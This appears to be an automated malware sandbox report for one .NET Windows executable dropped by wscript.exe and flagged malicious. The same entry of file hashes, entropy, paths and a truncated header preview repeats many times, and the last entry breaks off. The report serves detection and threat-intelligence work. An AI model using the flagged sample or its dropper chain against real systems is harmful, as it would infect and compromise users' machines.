                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Users\user\AppData\Local\Temp\aJEWGt.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:modified
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
